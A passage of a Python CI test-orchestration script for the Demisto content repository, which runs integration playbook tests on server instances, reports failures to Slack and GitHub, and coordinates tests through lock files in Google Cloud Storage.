res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
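# Illustrative example (hypothetical values): with
#   placeholders_map = {'%%SERVER_HOST%%': '10.0.0.5'}
#   config_item = {'name': 'MyIntegration', 'params': {'url': 'https://%%SERVER_HOST%%'}}
# the function returns
#   {'name': 'MyIntegration', 'params': {'url': 'https://10.0.0.5'}}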
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
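# Illustrative example (hypothetical AMI name): for
#   'Demisto-Circle-CI-Content-AMI-6.0-12345'
# the regular expression above captures '6.0', and the two-part version is padded
# to the three-part '6.0.0' before being returned.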
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
# turn off telemetry
turn_off_telemetry(server, demisto_api_key)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key, prints_manager,
thread_index=thread_index)
proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_api_key, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
prints_manager.add_print_job(f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}',
print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks whether the string representation of the current test configuration is already in
the executed_in_current_round set.
If it is, this test has already been executed once in the current round, meaning a full round has
completed and some tests could not be locked by this execution.
In that case a new round of monitoring is started by emptying the 'executed_in_current_round' set and
sleeping so that the locked tests can be released.
Args:
executed_in_current_round: A set containing the string representations of all test configurations, as they appear
in the conf.json file, that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new 'executed_in_current_round' set which contains only the current test configuration if a round was completed,
otherwise the same set with the current test configuration added.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
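# Illustrative trace of the round detection above (test names are hypothetical):
# starting from an empty set and processing tests A, B and then A again gives
#   set() -> {'A'} -> {'A', 'B'} -> A already seen: sleep 30s, reset -> {'A'}
# i.e. re-encountering a test marks the start of a new round rather than skipping it.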
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be run
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
else:
file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
with open(file_path, "w") as is_build_passed_file:
is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: Could not find exactly one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not response.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If the lock attempt has failed, yields False; if it succeeds, yields True
* Once the test is done, all integrations will be unlocked
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
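# Minimal usage sketch for the context manager above (illustrative only - this helper
# is not called anywhere in this module and its arguments are hypothetical).
def _example_acquire_test_lock_usage(test_integrations, test_timeout, prints_manager,
                                     thread_index, conf_json_path, tests_queue, test):
    # acquire_test_lock yields True only when every non-parallel integration was locked.
    with acquire_test_lock(test_integrations, test_timeout, prints_manager,
                           thread_index, conf_json_path) as lock_acquired:
        if lock_acquired:
            pass  # the test scenario would run here
        else:
            tests_queue.put(test)  # could not lock - re-queue the test for a later round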
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
This function safely unlocks the test's integrations.
If an unexpected error occurs, this method will log its details and the execution of other tests will continue.
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instantiating the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
This function safely locks the test's integrations and returns the result.
If an unexpected error occurs, this method will log its details and return False.
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
prints_manager.add_print_job(
f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}',
print,
thread_index,
include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If the given workflow ID is the same as the current workflow's, it simply returns True,
otherwise it queries the CircleCI API for the workflow and returns whether it is still running.
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <workflow-id>:<circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file exists with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can specify either a single integration or a list of integrations, this method
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
A list of the names of all integrations that take part in the test,
as specified in the test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock file for every integration specified in 'integrations_generation_number'.
Each file contains <workflow-id>:<circle-ci-build-number>:<test-timeout>,
where the <workflow-id> and <circle-ci-build-number> parts are for debugging and troubleshooting
and the <test-timeout> part makes it possible to unlock files whose test was revoked.
If the lock file creation fails for any of the integrations, the already created files will be cleaned up.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The test timeout in seconds
thread_index: The index of the thread that executes the locking
Returns:
True if lock files were created for all integrations, else False
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, create file precondition failed. '
f'Delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
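# Note on the if_generation_match precondition used above: passing 0 asks GCS to create
# the object only if it does not exist yet, while passing an existing blob's generation
# number overwrites only that exact version; a race with another build therefore surfaces
# as PreconditionFailed instead of silently clobbering the other build's lock.
# Minimal sketch under assumed bucket/blob names (illustrative, never called):
def _example_create_lock_if_absent(storage_client):
    blob = storage_client.bucket('example-locks-bucket').blob('locks/SomeIntegration')
    blob.upload_from_string('workflow-id:build-number:330', if_generation_match=0)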
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete the lock files of all integrations specified in 'integrations_details'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying the build number is the same as the current build number to avoid deleting other tests' lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that have a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
